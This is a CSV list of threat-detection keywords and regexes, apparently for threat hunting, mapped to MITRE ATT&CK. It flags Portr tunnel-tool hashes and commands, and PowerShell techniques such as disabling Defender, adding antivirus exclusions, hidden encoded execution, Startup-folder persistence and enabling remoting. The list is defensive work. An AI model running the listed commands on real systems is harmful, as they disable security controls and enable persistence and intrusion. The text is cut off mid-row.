"*6f4cee01855c127463f149bb94adc8bec1a5b9b19f8edfd8471002effbdd1fdb*",".{0,1000}6f4cee01855c127463f149bb94adc8bec1a5b9b19f8edfd8471002effbdd1fdb.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*727b1692111d8e799e8deb7f1243503994f08d71488805d3f8c35015b142a6b7*",".{0,1000}727b1692111d8e799e8deb7f1243503994f08d71488805d3f8c35015b142a6b7.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*7a9f4a3bfc2a24075f9331f9ac21655b270ca43bb1845bc8f81e56943374a775*",".{0,1000}7a9f4a3bfc2a24075f9331f9ac21655b270ca43bb1845bc8f81e56943374a775.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*8027e8c3404952986b4323ee0773650bab81ae3cb36eb5f643b95c4f2c912ebf*",".{0,1000}8027e8c3404952986b4323ee0773650bab81ae3cb36eb5f643b95c4f2c912ebf.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*83a82600aa1102569a14bb436c08b4abde68c4b47bd05934a4fed0ca8d187abd*",".{0,1000}83a82600aa1102569a14bb436c08b4abde68c4b47bd05934a4fed0ca8d187abd.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*85eaf5c3848e384ff88f16bf59f8d6e31194e01b2b8be58191de5a74d03348be*",".{0,1000}85eaf5c3848e384ff88f16bf59f8d6e31194e01b2b8be58191de5a74d03348be.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*869df81bed2d14ea117e02aaff9894b9f9eac2b6c8802dd7be37eb14da8cca48*",".{0,1000}869df81bed2d14ea117e02aaff9894b9f9eac2b6c8802dd7be37eb14da8cca48.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*892dfce05bfcab969306a1034ef0fc0decc52d82b43cda8b6c395549c8ef1133*",".{0,1000}892dfce05bfcab969306a1034ef0fc0decc52d82b43cda8b6c395549c8ef1133.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*8e293b5a49ada7798b6d681ec267efecd5c6fbd12163ac13b042707b80f56c50*",".{0,1000}8e293b5a49ada7798b6d681ec267efecd5c6fbd12163ac13b042707b80f56c50.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*906172da211b4b657ad01652ffa8911d5add169b3eca2c77f5f1b79a178fe977*",".{0,1000}906172da211b4b657ad01652ffa8911d5add169b3eca2c77f5f1b79a178fe977.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*926dd1743afb553ef123f185b1ea1a0a463a25b4c4d0635142fa4ee4d5aceedb*",".{0,1000}926dd1743afb553ef123f185b1ea1a0a463a25b4c4d0635142fa4ee4d5aceedb.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*97fc48554850cc143f262d6cc01fa415c7ff3bc517d2505795b70f447b0de993*",".{0,1000}97fc48554850cc143f262d6cc01fa415c7ff3bc517d2505795b70f447b0de993.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*9b50261daa62f2440c9e3ae0399615fe0b4d5dc807f4f9f1fdcd8a80bc0ab22f*",".{0,1000}9b50261daa62f2440c9e3ae0399615fe0b4d5dc807f4f9f1fdcd8a80bc0ab22f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*9bf17e192c1d67d3116bee309c16ccdeaae36a68e53db5b555ccaf9455a255b1*",".{0,1000}9bf17e192c1d67d3116bee309c16ccdeaae36a68e53db5b555ccaf9455a255b1.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*a577a27e8304b63365699d0220bade895000da9fde1b29fdb0925292dcff0b4f*",".{0,1000}a577a27e8304b63365699d0220bade895000da9fde1b29fdb0925292dcff0b4f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*a7b789b5fbd81fafca5a5dca4671de13c6bf3b54b807c513d03bd1ee3f5290a9*",".{0,1000}a7b789b5fbd81fafca5a5dca4671de13c6bf3b54b807c513d03bd1ee3f5290a9.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*a819a2e3e513712ec9dcba8129b7471aafc70ca6631561a8f6a4881a51ffa2c4*",".{0,1000}a819a2e3e513712ec9dcba8129b7471aafc70ca6631561a8f6a4881a51ffa2c4.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*a853e1ad13c03ed6e28dba69cd407bfb2bdde3401c83abe79ab57a42fbd8968a*",".{0,1000}a853e1ad13c03ed6e28dba69cd407bfb2bdde3401c83abe79ab57a42fbd8968a.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*aea26b638e19ae54c752ccc0d9985bc6ccf0214a56ca5b2b26714feef2d95ac9*",".{0,1000}aea26b638e19ae54c752ccc0d9985bc6ccf0214a56ca5b2b26714feef2d95ac9.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*amalshaji/portr*",".{0,1000}amalshaji\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*amalshaji/taps/portr*",".{0,1000}amalshaji\/taps\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*be21413da8a75c62583b1c9eaf5194f5853f5ee8aba7e67510069717a0fbfcf2*",".{0,1000}be21413da8a75c62583b1c9eaf5194f5853f5ee8aba7e67510069717a0fbfcf2.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*c3dcf5597629c40fa47791ba86420ff1322ca0adb6110b4fceec6168f5141ee7*",".{0,1000}c3dcf5597629c40fa47791ba86420ff1322ca0adb6110b4fceec6168f5141ee7.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local 
http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*c948e37486bb247fbbc9f20b5040a11f28f642f5760be9abda81fc979c9911f1*",".{0,1000}c948e37486bb247fbbc9f20b5040a11f28f642f5760be9abda81fc979c9911f1.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*ccf830a3d9985235d37d82bc38432568ff15744e3772fbf52c947914cdd6745a*",".{0,1000}ccf830a3d9985235d37d82bc38432568ff15744e3772fbf52c947914cdd6745a.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*db73ab5dce549d531bd7e8ec51a89bf5040da07200e2834e7b652a0384db783b*",".{0,1000}db73ab5dce549d531bd7e8ec51a89bf5040da07200e2834e7b652a0384db783b.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*e2ffe6675e592cf2760e3b9de2fd6a7c0298226b76f86f26b084de63ff4be574*",".{0,1000}e2ffe6675e592cf2760e3b9de2fd6a7c0298226b76f86f26b084de63ff4be574.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public 
internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*ecdf4ee43944adcc0aa55f707711a0be5a0ff539792175195aeed7e3a860e457*",".{0,1000}ecdf4ee43944adcc0aa55f707711a0be5a0ff539792175195aeed7e3a860e457.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*ee64735aef9a98eff32fa75e2bf8df53b3c8312d85ca1d02e37c01d06fa6c47e*",".{0,1000}ee64735aef9a98eff32fa75e2bf8df53b3c8312d85ca1d02e37c01d06fa6c47e.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*f1aa7c960a64c65548d23d2a77b3aa04844695174e44c7e04e0094190a1b8b46*",".{0,1000}f1aa7c960a64c65548d23d2a77b3aa04844695174e44c7e04e0094190a1b8b46.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*f9ec1153b825b2a9bdb5bc59df82bfb08b7b85fe371c591f37c6748957378591*",".{0,1000}f9ec1153b825b2a9bdb5bc59df82bfb08b7b85fe371c591f37c6748957378591.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*http://localhost:7777*",".{0,1000}http\:\/\/localhost\:7777.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*https://portr.dev/client/installation/*",".{0,1000}https\:\/\/portr\.dev\/client\/installation\/.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*Portr - Expose local ports to public URLs*",".{0,1000}Portr\s\-\sExpose\slocal\sports\sto\spublic\sURLs.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr auth set --token *",".{0,1000}portr\sauth\sset\s\-\-token\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr -c *.yaml*",".{0,1000}portr\s\-c\s.{0,1000}\.yaml.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local 
http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr http *",".{0,1000}portr\shttp\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr tcp *",".{0,1000}portr\stcp\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr.exe http *",".{0,1000}portr\.exe\shttp\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr_admin.apis*",".{0,1000}portr_admin\.apis.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr_admin.db*",".{0,1000}portr_admin\.db.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr_admin.models.auth*",".{0,1000}portr_admin\.models\.auth.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr_admin.services*",".{0,1000}portr_admin\.services.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*PORTR_ADMIN_GITHUB_CLIENT_ID*",".{0,1000}PORTR_ADMIN_GITHUB_CLIENT_ID.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*PORTR_ADMIN_GITHUB_CLIENT_SECRET*",".{0,1000}PORTR_ADMIN_GITHUB_CLIENT_SECRET.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*portr_next_url*",".{0,1000}portr_next_url.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 
- TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "* -ep Bypass-nop function *[System.Security.Cryptography.Aes]::Create()*.CreateDecryptor()*.TransformFinalBlock*[System.Text.Encoding]::Utf8.GetString*",".{0,1000}\s\-ep\sBypass\-nop\sfunction\s.{0,1000}\[System\.Security\.Cryptography\.Aes\]\:\:Create\(\).{0,1000}\.CreateDecryptor\(\).{0,1000}\.TransformFinalBlock.{0,1000}\[System\.Text\.Encoding\]\:\:Utf8\.GetString.{0,1000}","greyware_tool_keyword","powershell","obfuscation techniques with powershell","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -ep Unrestricted -nop function *[System.Security.Cryptography.Aes]::Create()*.CreateDecryptor()*.TransformFinalBlock*[System.Text.Encoding]::Utf8.GetString*",".{0,1000}\s\-ep\sUnrestricted\s\-nop\sfunction\s.{0,1000}\[System\.Security\.Cryptography\.Aes\]\:\:Create\(\).{0,1000}\.CreateDecryptor\(\).{0,1000}\.TransformFinalBlock.{0,1000}\[System\.Text\.Encoding\]\:\:Utf8\.GetString.{0,1000}","greyware_tool_keyword","powershell","obfuscation techniques with powershell","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*",".{0,1000}\s\-Name\sDisableAntiSpyware\s\-Value\s1\s\-PropertyType\sDWORD\s\-Force.{0,1000}","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. 
disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "* -NOP -WIND HIDDeN -eXeC BYPASS -NONI *",".{0,1000}\s\-NOP\s\-WIND\sHIDDeN\s\-eXeC\sBYPASS\s\-NONI\s.{0,1000}","greyware_tool_keyword","powershell","suspicious powershell arguments order used by many exploitation tools","T1059.001 - T1059.003 - T1027.009","TA0002 - TA0005","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*[System.Environment]::GetEnvironmentVariable('username')*",".{0,1000}\[System\.Environment\]\:\:GetEnvironmentVariable\(\'username\'\).{0,1000}","greyware_tool_keyword","powershell","alternative to whoami","T1033 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","6","N/A","N/A","N/A","N/A" "*\powershell.exe* += hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\+\=\shidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*\powershell.exe* +=hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\+\=hidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*\powershell.exe* = hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\=\shidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. 
It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*\powershell.exe* =hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\=hidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*Add-DnsClientDohServerAddress *-ServerAddress *",".{0,1000}Add\-DnsClientDohServerAddress\s.{0,1000}\-ServerAddress\s.{0,1000}","greyware_tool_keyword","powershell","adding a DNS over HTTPS server with powershell","T1568.003 - T1049 - T1562.001","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientdohserveraddress?view=windowsserver2022-ps","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force*",".{0,1000}Add\-MpPreference\s\-ExclusionPath\s\@\(\$env\:UserProfile,\s\$env\:ProgramData\)\s\-ExclusionExtension\s\'\.exe\'\s\-Force.{0,1000}","greyware_tool_keyword","powershell","add exclusions for defender","T1489","TA0005","N/A","N/A","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*",".{0,1000}Add\-MpPreference\s\-ExclusionProcess\s.{0,1000}\\Windows\\System32\\WindowsPowerShell\\v1\.0\\powershell\.exe.{0,1000}","greyware_tool_keyword","powershell","Exclude powershell from defender detections","T1562.001 - T1562.002 - 
T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*",".{0,1000}Add\-PswaAuthorizationRule\s\-UsernName\s\\.{0,1000}\s\-ComputerName\s\\.{0,1000}\s\-ConfigurationName\s\\.{0,1000}","greyware_tool_keyword","powershell","allows all users to access all computers with a specified configuration","T1053","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*Add-WindowsCapability -Online -Name OpenSSH.Server*",".{0,1000}Add\-WindowsCapability\s\-Online\s\-Name\sOpenSSH\.Server.{0,1000}","greyware_tool_keyword","powershell","install openssh server (critical on DC - must not be installed)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*",".{0,1000}Clear\-RecycleBin\s\-Force\s\-ErrorAction\sSilentlyContinue.{0,1000}","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","N/A","10","8","751","265","2024-08-12T21:40:40Z","2021-09-08T20:33:18Z" "*cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc *","cmd\.exe\s\/c\sPowerShell\.exe\s\-Exec\sByPass\s\-Nol\s\-Enc\s.{0,1000}","greyware_tool_keyword","powershell","Jenkins Abuse Without admin access","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*copy-item *\roaming\microsoft\windows\start 
menu\programs\startup*",".{0,1000}copy\-item\s.{0,1000}\\roaming\\microsoft\\windows\\start\smenu\\programs\\startup.{0,1000}","greyware_tool_keyword","powershell","Copy file to startup via Powershell","T1050 - T1106 - T1547.009","TA0003 - TA0005 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*enable-psremoting -force*",".{0,1000}enable\-psremoting\s\-force.{0,1000}","greyware_tool_keyword","powershell","enables WinRM","T1077 - T1021","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","10","10","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*Find-LocalAdminAccess -Verbose*",".{0,1000}Find\-LocalAdminAccess\s\-Verbose.{0,1000}","greyware_tool_keyword","powershell","Find machine where the user has admin privs","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","Discovery","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","AD Enumeration","7","6","N/A","N/A","N/A","N/A" "*gci 